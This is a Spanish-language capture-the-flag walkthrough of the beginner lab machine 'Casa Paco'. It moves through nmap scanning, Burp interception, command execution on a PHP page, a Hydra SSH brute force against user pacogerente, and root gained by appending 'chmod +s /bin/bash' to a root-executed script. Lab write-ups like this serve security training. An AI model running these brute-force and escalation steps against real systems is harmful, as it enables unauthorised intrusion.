> For the complete documentation index, see [llms.txt](https://beafn28.gitbook.io/beafn28/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://beafn28.gitbook.io/beafn28/writeups/the-hacker-labs/casa-paco.md).

# Casa Paco

🔍 Dificultad: Principiante

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.60
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F9axuNAv7ma5PorthH9ro%2Fimage.png?alt=media&amp;token=160cc102-5934-4efa-ace2-95df7a3cd1f8" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -p- --open 192.168.1.60 --min-rate 5000 -n
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FlXrU7T1RYqFv2dV85pCF%2Fimage.png?alt=media&amp;token=6a8f2c58-25f7-4f13-bd32-40b29f83c094" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH y** el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 192.168.1.60
```

para obtener más información sobre ese puerto específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FDJCS8M55ErEewgshhD8d%2Fimage.png?alt=media&amp;token=84bde919-22e6-4dba-b89a-949b7604872a" alt=""><figcaption></figcaption></figure>

Miramos a ver que contiene el puerto 80 por si encontramos alguna información relevante pero hay que añadir el dominio **casapaco.thl**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FOpq9Eqe8NxS9zcomMSL5%2Fimage.png?alt=media&amp;token=b40ac121-a2cd-41ea-970f-918e83e8f67c" alt=""><figcaption></figcaption></figure>

Revisando la página encontramos esto interesante.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FeWHq4jKq8Dxo4OV6xnGj%2Fimage.png?alt=media&amp;token=3499c68d-f32f-4516-97a9-6f9e6f46efa1" alt=""><figcaption></figcaption></figure>

Interceptamos con **Burpsuite** peticiones.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F4MXvwsS1yCa2dSf8mhXn%2Fimage.png?alt=media&amp;token=290a32f3-f4ea-4c6e-903b-0b10766ba8fb" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Dado que hemos identificado otra página, **/llevar1.php**, intentaremos ejecutar comandos en ella para determinar si proporciona más información que la página anterior.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FNG7uy0As3Hdp2KmkEA7q%2Fimage.png?alt=media&amp;token=23d2bc2f-1ad8-4074-bf13-8847cc017f55" alt=""><figcaption></figcaption></figure>

Descubrimos el usuario pacogerente por lo que realizamos fuerza bruta con Hydra.

```bash
hydra -l pacogerente -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.60 
```

Iniciamos sesión con esas credenciales.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FyJB24Tv42bfPfotSx7hM%2Fimage.png?alt=media&amp;token=022fe047-ae80-48ba-a4c0-154a1b5fb6d9" alt=""><figcaption></figcaption></figure>

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar. No tenemos permisos SUDO.&#x20;

Tenemos un archivo que se está ejecutando por lo que cambiamos el contenido para poder manipular y ser root.

```bash
echo 'chmod +s /bin/bash' >> /home/pacogerente/fabada.sh
/bin/bash -p
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FzaGRgGvFItYAfIuzuOaq%2Fimage.png?alt=media&amp;token=ee638fb1-a433-4e4c-b113-c46963dbc7e0" alt=""><figcaption></figcaption></figure>

Ya somos **root**.&#x20;

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀
